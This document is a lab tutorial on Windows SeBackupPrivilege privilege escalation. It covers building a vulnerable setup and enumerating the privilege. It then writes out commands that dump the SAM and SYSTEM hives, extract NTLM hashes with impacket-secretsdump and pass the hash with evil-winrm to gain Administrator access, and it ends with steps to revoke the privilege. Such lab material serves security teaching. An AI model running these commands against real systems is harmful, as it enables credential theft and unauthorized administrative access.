The SeBackupPrivilege is a Windows privilege that provides a user or process with the ability to read files and directories, regardless of the security settings on those objects. This privilege can be used by certain backup programs or processes that require the capability to back up or copy files that would not normally be accessible to the user.
However, if this privilege is not properly managed or if it is granted to unauthorized users or processes, it can lead to a privilege escalation vulnerability. The SeBackupPrivilege vulnerability can be exploited by malicious actors to gain unauthorized access to sensitive files and data on a system.
- Open a PowerShell with local Administrator privileges and run the following command to create a new user:
net user ncv Passw0rd! /add
- Run the following command to enable WinRM service:
Enable-PSRemoting -Force
- Add the new user to "Remote Management Users" group:
net localgroup "Remote Management Users" ncv /add
- Then, run the following commands to install and import the Carbon module:
Install-Module -Name carbon -Force
and
Import-Module carbon
- Use the following cmdlets to grant the SeBackupPrivilege to the current user and verify the privilege:
Grant-CPrivilege -Identity ncv -Privilege SeBackupPrivilege
and
Test-CPrivilege -Identity ncv -Privilege SeBackupPrivilege
Outcome:
To set up the lab with the 'SeBackupPrivilege' vulnerability is by using the custom PowerShell script named SeBackupPrivilege.ps1.
Open a PowerShelll with local Administrator privileges and run the script:
.\SeBackupPrivilege.ps1
Outcome:
To perform manual enumeration, you can open a command prompt and use the following command to enumerate the current privileges of the user:
whoami /priv
Outcome:
To run the SharpUp tool and perform an enumeration of the SeBackupPrivilege vulnerability, you can execute the following command with appropriate arguments:
SharpUp.exe audit TokenPrivileges
Outcome:
To abuse this vulnerability you should follow these steps:
- Create a temp directory:
mkdir C:\temp
- Copy the sam and system hive of HKLM to C:\temp and then download them.
reg save hklm\sam C:\temp\sam.hive
and
reg save hklm\system C:\temp\system.hive
Outcome:
- Use impacket-secretsdump tool (Kali Linux Default) and obtain ntlm hashes:
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Outcome:
- Use again evil-winrm to pass the hash and connect as Local Administrator:
evil-winrm -i <ip> -u "Administrator" -H "<hash>"
Outcome:
Follow the steps below to remove the SeBackupPrivilege from a user:
-
Press Win + R to open the Run dialog, type
secpol.msc, and hit Enter. This will open the Local Security Policy editor. -
In the Local Security Policy editor, navigate to Local Policies > User Rights Assignment.
-
Look for the Back up files and directories policy (which corresponds to SeBackupPrivilege).
-
Double-click the policy, and a properties window will appear.
-
In the properties window, you can remove the user or group from the list to revoke the privilege. Click Apply and then OK to save the changes.